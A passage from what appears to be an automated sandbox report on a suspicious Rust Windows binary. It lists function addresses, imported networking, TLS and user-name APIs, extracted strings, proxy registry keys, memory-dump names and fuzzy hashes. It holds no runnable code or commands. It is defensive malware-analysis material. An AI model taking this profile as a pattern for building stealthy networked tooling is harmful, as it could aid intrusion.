Instruction ID: 45165a59b787e643e27d19efd7d1f55bad32512aff11aef639e3955a19db307e
Opcode Fuzzy Hash: 9c5260df02497e11d052b730d8a91ad21b9df45a120170834e6cdb7285e18642
Instruction Fuzzy Hash: 1D528B32608FC585EB25AB15E4447EEB3A4FB89794F844126DB8D17B89DF3CD25AC700

Function 00007FF71A80E336 Relevance: 15.5, APIs: 9, Strings: 1, Instructions: 521
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A80DB1D
memcpy.MSVCRT ref: 00007FF71A80DB3C
memcpy.MSVCRT ref: 00007FF71A80DB74
memcpy.MSVCRT ref: 00007FF71A80E475
memcpy.MSVCRT ref: 00007FF71A80E4A2
memcpy.MSVCRT ref: 00007FF71A80E563
memcpy.MSVCRT ref: 00007FF71A80E7A6
memcpy.MSVCRT ref: 00007FF71A80E8F3
memcpy.MSVCRT ref: 00007FF71A80EA8B

Strings

httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A80DC23, 00007FF71A80E33E

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
API String ID: 3510742995-2841460514
Opcode ID: 0185682a56fb4bd25d6a01511275e25dae048139d2c582cadeb00ece60d8bc56
Instruction ID: cc23be55b08a4088fbce6f28881c0d428d3353ec833bb66376bb709aa349b39b
Opcode Fuzzy Hash: 0185682a56fb4bd25d6a01511275e25dae048139d2c582cadeb00ece60d8bc56
Instruction Fuzzy Hash: 04428A32608FC585EB26AB15E4447EEB3A4FB89B94F844126DB8D17B89DF3CD259C700

Function 00007FF71A80E2AE Relevance: 15.5, APIs: 9, Strings: 1, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A80DB1D
memcpy.MSVCRT ref: 00007FF71A80DB3C
memcpy.MSVCRT ref: 00007FF71A80DB74
memcpy.MSVCRT ref: 00007FF71A80E475
memcpy.MSVCRT ref: 00007FF71A80E4A2
memcpy.MSVCRT ref: 00007FF71A80E563
memcpy.MSVCRT ref: 00007FF71A80E7A6
memcpy.MSVCRT ref: 00007FF71A80E8F3
memcpy.MSVCRT ref: 00007FF71A80EA8B

Strings

httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A80DC23

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
API String ID: 3510742995-2841460514
Opcode ID: 969cb3c720e553bcd93b746ddc46fae0d967e28293c8d6d9e2067511cbea0a33
Instruction ID: 8cf7c6c60a96cc39a58b3a381e46319801e1dc28cf99d3f079ea4afe7f34ad3f
Opcode Fuzzy Hash: 969cb3c720e553bcd93b746ddc46fae0d967e28293c8d6d9e2067511cbea0a33
Instruction Fuzzy Hash: 43428A32608FC585EB61AB15E4447EEB3A4FB89B94F844126DB8D17B89DF3CD25AC700

Function 00007FF71A809BBB Relevance: 14.0, APIs: 3, Strings: 4, Instructions: 1764COMMON

Download Yara Rule

APIs

CreateIoCompletionPort.KERNEL32 ref: 00007FF71A809CDD
memset.MSVCRT ref: 00007FF71A809F79
memcpy.MSVCRT ref: 00007FF71A80A80B

Strings

Failed to `Enter::block_on`, xrefs: 00007FF71A80BDA2
, xrefs: 00007FF71A80BB96
=, xrefs: 00007FF71A809C8D
cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 00007FF71A80BEF0

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: CompletionCreatePortmemcpymemset
String ID: $=$Failed to `Enter::block_on`$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
API String ID: 1513132611-2342378900
Opcode ID: f506b5b00194d0f6bc72fd8d46d3559b8fdbda128bbda6c04036f8d7b98ab549
Instruction ID: 03d4bc040d42ea67e2aab706370a8f7c13276ce68f1f99227daaa1a648e82174
Opcode Fuzzy Hash: f506b5b00194d0f6bc72fd8d46d3559b8fdbda128bbda6c04036f8d7b98ab549
Instruction Fuzzy Hash: 5813AD32A08FC185F762AB15E5443EAB3A4FB88794F808276DA8D07795DF3CE569C710

Function 00007FF71A7E29FC Relevance: 12.8, APIs: 5, Strings: 3, Instructions: 849
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError, xrefs: 00007FF71A7E2AE6
, xrefs: 00007FF71A7E3AB8
dns error, xrefs: 00007FF71A7E2ECE

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: $dns error$invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError
API String ID: 0-1983688740
Opcode ID: 8e210988ce0f5fa5a0823b1a5b5ea6afc15ea0a0b88f9b4ea68c1aafdbd5ff0f
Instruction ID: 92569c8927d06d891e93615b5f4d1ff5b73b892f9346fcc6fad3aecb813139fa
Opcode Fuzzy Hash: 8e210988ce0f5fa5a0823b1a5b5ea6afc15ea0a0b88f9b4ea68c1aafdbd5ff0f
Instruction Fuzzy Hash: D9929F32A08FC584E761AF15E4413EAB3A4FB59B98F844132DE8D1779ADF38D299C710

Function 00007FF71A7A1190 Relevance: 12.2, APIs: 8, Instructions: 203
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF71A7A11F6
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF71A7A1268
malloc.MSVCRT ref: 00007FF71A7A1332
strlen.MSVCRT ref: 00007FF71A7A1355
malloc.MSVCRT ref: 00007FF71A7A1361
memcpy.MSVCRT ref: 00007FF71A7A1375
GetStartupInfoA.KERNEL32 ref: 00007FF71A7A1473

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: 80d1d224de1a6640401435d731e26d080493a7775019c0812617ece2ba33a5da
Instruction ID: de76dc9dbf083829dc0716deb23d8e94edfead6fb632ba5ad2ff70bb1a78de26
Opcode Fuzzy Hash: 80d1d224de1a6640401435d731e26d080493a7775019c0812617ece2ba33a5da
Instruction Fuzzy Hash: 42815875E18B0691FB12BF15A4907B9E7A0AF49BA0FC840B7DD0D43395DE2CE96C8720

Function 00007FF71A7E48D8 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 497networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 00007FF71A7E4A78
memcpy.MSVCRT ref: 00007FF71A7E4C36

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7E5114, 00007FF71A7E5225

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: connectmemcpy
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 456332141-2333694755
Opcode ID: 65e8e5d18f29cf492085d96066f961543d32c184f994071bfc2f2299d1068bfd
Instruction ID: 3d24857dbfba9d9d38581391a2f68179409ed37e002f35152775db623701b4b3
Opcode Fuzzy Hash: 65e8e5d18f29cf492085d96066f961543d32c184f994071bfc2f2299d1068bfd
Instruction Fuzzy Hash: 54424C32A08BC681E7719F25E4403EAB3A4FB99754F808166DB8C47B56EF3CE199C750

Function 00007FF71A7D39EB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 301COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL ref: 00007FF71A7D3BD0

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7D3E2E, 00007FF71A7D3EA6
Out of bounds accesspolling StreamFuture twice/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/stream/stream/into_future.rs, xrefs: 00007FF71A7D3E46, 00007FF71A7D3E56

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorStatus
String ID: Out of bounds accesspolling StreamFuture twice/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/stream/stream/into_future.rs$called `Result::unwrap()` on an `Err` value
API String ID: 1596131371-362419011
Opcode ID: 1829bbf6aedae0a629c836ab05c507dfaee0e757e8c8a3793845133ae9de0390
Instruction ID: df601689fa5a0b812c051d4f462370f1e264314b1b169fc24b0d15de72daf08e
Opcode Fuzzy Hash: 1829bbf6aedae0a629c836ab05c507dfaee0e757e8c8a3793845133ae9de0390
Instruction Fuzzy Hash: 32D17E72A08E8681FA50EF15E4486BAB7A4FB887A0F844077DA9D43795DF3CE24DC710

Function 00007FF71A84EB09 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF71A84EBE5
WSAGetLastError.WS2_32 ref: 00007FF71A84EBF3

Strings

filled overflowfilled must not become larger than initialized, xrefs: 00007FF71A84ED0D

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLastrecv
String ID: filled overflowfilled must not become larger than initialized
API String ID: 2514157807-3814584485
Opcode ID: d08d5ecb5ad2450facc223ad0b58510cd64f2b9478f6b0b46bc67e3f6e2289f7
Instruction ID: 54549f7f6f272efeb4058013b71d24bf4154377de1b6a22808e32fb2f92ef15f
Opcode Fuzzy Hash: d08d5ecb5ad2450facc223ad0b58510cd64f2b9478f6b0b46bc67e3f6e2289f7
Instruction Fuzzy Hash: 9051E472A0CE4585FB21AB19E4407AAE761FB88BA8F944173EE9D037D5DE3CE459C310

Function 00007FF71A816696 Relevance: 5.2, APIs: 1, Strings: 2, Instructions: 674COMMON

Download Yara Rule

Strings

HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyALL_PROXYall_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=, xrefs: 00007FF71A816C11
httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A816C0A, 00007FF71A816C35, 00007FF71A816CBD, 00007FF71A816D15, 00007FF71A81709C

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: QueryValue
String ID: HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyALL_PROXYall_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=$httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
API String ID: 3660427363-456205512
Opcode ID: f0bc1938e384b3d6c6cb0939c1b3d180dcc6a136b5b099a3b24ab9ef4b8d6c6c
Instruction ID: 602a89b828698cb124c7905c17ec193704e0099a97ca0093c7d525b5a9e09ad3
Opcode Fuzzy Hash: f0bc1938e384b3d6c6cb0939c1b3d180dcc6a136b5b099a3b24ab9ef4b8d6c6c
Instruction Fuzzy Hash: 77628222A0CE8685FB22AB15E4413FAE361FB847A4F844176DE8D07B95DF7CE169C710

Function 000001912B785368 Relevance: 4.7, APIs: 3, Instructions: 190stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001912B78552C: malloc.LIBCMT ref: 000001912B785548

GetUserNameA.ADVAPI32(?,?,?,?,?,?,?,-00000001,?,-00000001,?,00000002,000001912B77BC89), ref: 000001912B7853EF
strrchr.LIBCMT ref: 000001912B78542D
_snprintf.LIBCMT ref: 000001912B7854DB

Memory Dump Source

Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd

Yara matches

Similarity

API ID: NameUser_snprintfmallocstrrchr
String ID:
API String ID: 1238167203-0
Opcode ID: 3fcc9734dfb008eb330924bec949316915ae8132a5d43751b4f12920707a76c7
Instruction ID: 2b5619cfcc6674701dfe4688014ce91c0656a71e885a1ae2b0e2cd5003d592be
Opcode Fuzzy Hash: 3fcc9734dfb008eb330924bec949316915ae8132a5d43751b4f12920707a76c7
Instruction Fuzzy Hash: 97518470758A091FEB58BB68A4667E972D2F7CE310F20452EA18EC32E3DE24D8439745

Function 00007FF71A7D4165 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL ref: 00007FF71A7D41D5

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: 05e3aa1f477d5b3e428a0d47a6077f38ab312bb730ff683002967aac5b469b3d
Instruction ID: 58d82bfe70969d66d69bba8a3af22b9d6917b22ba89f7bc8de8c57b592d29f67
Opcode Fuzzy Hash: 05e3aa1f477d5b3e428a0d47a6077f38ab312bb730ff683002967aac5b469b3d
Instruction Fuzzy Hash: AA419D32A08F4186FB10AF51E0413A9E3A4FB88BB0F844172DA8D47B86DF7CE569C710

Function 00007FF71A81FB52 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

Microsoft Unified Security Protocol Provider, xrefs: 00007FF71A81FC99

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: Microsoft Unified Security Protocol Provider
API String ID: 0-238809041
Opcode ID: 76d1b550ed0c15f42858f841513e10c3d785c80694a0528341cce17052c7faf9
Instruction ID: d9713263e3707c7dbb36e15ba366a58bef93a18c1af26874476cd6aa1aed8c0d
Opcode Fuzzy Hash: 76d1b550ed0c15f42858f841513e10c3d785c80694a0528341cce17052c7faf9
Instruction Fuzzy Hash: 6F51F522A18BC186FB61CB15E4003AAE7A1FB99B94F948137DE8C17794DF3DD49AC700

Function 00007FF71A8209AE Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e94cbdac3f3af83b3aa98e4f55e03feac2159b6e1584c848038b7c6732948f0e
Instruction ID: 5ca70c7fe950695f9b5ad19a935d451355cdfca70674e2a12da7796a5f7681da
Opcode Fuzzy Hash: e94cbdac3f3af83b3aa98e4f55e03feac2159b6e1584c848038b7c6732948f0e
Instruction Fuzzy Hash: B3C08C00F2A482C2FA5836235C823B8A0B02B0E3A0FC400B2C908C1282DE0CADFF4B20

Function 00007FF71A7E1777 Relevance: 41.2, APIs: 26, Strings: 1, Instructions: 706
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A7E259D

Strings

future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs, xrefs: 00007FF71A7E2766, 00007FF71A7E2782

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs
API String ID: 3510742995-3485458656
Opcode ID: 03d25209b632549addd38d1fea2685cf485516300824df6382c71af748816794
Instruction ID: 78a314dfa5728f4c8bf41a6d22d3476405a1522798d5e58dc62b2f0288f39835
Opcode Fuzzy Hash: 03d25209b632549addd38d1fea2685cf485516300824df6382c71af748816794
Instruction Fuzzy Hash: B9929C22608FC191E7769F28E0453EAB364FB98758F845122DF9C13756EF39E2A9C710

Function 00007FF71A7DF081 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 601
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertFreeCertificateContext.CRYPT32 ref: 00007FF71A7DF21A
CertFreeCertificateContext.CRYPT32 ref: 00007FF71A7DF222
CertGetCertificateChain.CRYPT32 ref: 00007FF71A7DF307
CertFreeCertificateContext.CRYPT32 ref: 00007FF71A7DF3DB
CertFreeCertificateContext.CRYPT32 ref: 00007FF71A7DF40A
CertFreeCertificateChain.CRYPT32 ref: 00007FF71A7DF442
CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF71A7DF4D4
CertFreeCertificateChain.CRYPT32 ref: 00007FF71A7DF570
CertFreeCertificateContext.CRYPT32 ref: 00007FF71A7DF57A
CertFreeCertificateContext.CRYPT32 ref: 00007FF71A7DFBB4

Strings

1.3.6.1.5.5.7.3.1, xrefs: 00007FF71A7DF297
unexpected EOF during handshakeassertion failed: size >= nread, xrefs: 00007FF71A7DFBE8
, xrefs: 00007FF71A7DF281
1.3.6.1.4.1.311.10.3.3, xrefs: 00007FF71A7DF2A3
2.16.840.1.113730.4.1, xrefs: 00007FF71A7DF2AF

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: CertCertificate$Free$Context$Chain$PolicyVerify
String ID: $1.3.6.1.4.1.311.10.3.3$1.3.6.1.5.5.7.3.1$2.16.840.1.113730.4.1$unexpected EOF during handshakeassertion failed: size >= nread
API String ID: 2819978641-816880757
Opcode ID: 1843e9c215b49a4a5ff824598aff6a49c0831b01fa7fe072480c1136848e917f
Instruction ID: b48aef96b0c6b3033d19d1deb62c4a4aadaf4c6c3996dbc4fad0fb4c63071101
Opcode Fuzzy Hash: 1843e9c215b49a4a5ff824598aff6a49c0831b01fa7fe072480c1136848e917f
Instruction Fuzzy Hash: FD527E22A0CBC186FB65AB11E0503EAF7A0FB89794F808176DA8D47B95DF3CE55D8710

Function 00007FF71A7E1789 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A7E192B
memcpy.MSVCRT ref: 00007FF71A7E1ADD
memcpy.MSVCRT ref: 00007FF71A7E1AF8

Strings

future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs, xrefs: 00007FF71A7E2782

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs
API String ID: 3510742995-3485458656
Opcode ID: a7d2cc0111837070776fb5060f3da2d854479794757643ed3580a8686ca835a7
Instruction ID: ebc5c12dc9299ae3e7f7ee848ca6248a17786840d2117dcd2e22147c85004c86
Opcode Fuzzy Hash: a7d2cc0111837070776fb5060f3da2d854479794757643ed3580a8686ca835a7
Instruction Fuzzy Hash: 96E18D32608FC591EB2A9B24E5413EDF364FB99354F805122DF9C13662EF38E2A9C710

Function 00007FF71A7E3C68 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 388
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32 ref: 00007FF71A7E3D85
ioctlsocket.WS2_32 ref: 00007FF71A7E3DE5
WSAIoctl.WS2_32 ref: 00007FF71A7E3EEA

Strings

Network unreachabletcp connect error, xrefs: 00007FF71A7E461D
tcp open errortcp set_nonblocking errortcp bind local error, xrefs: 00007FF71A7E3D98

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
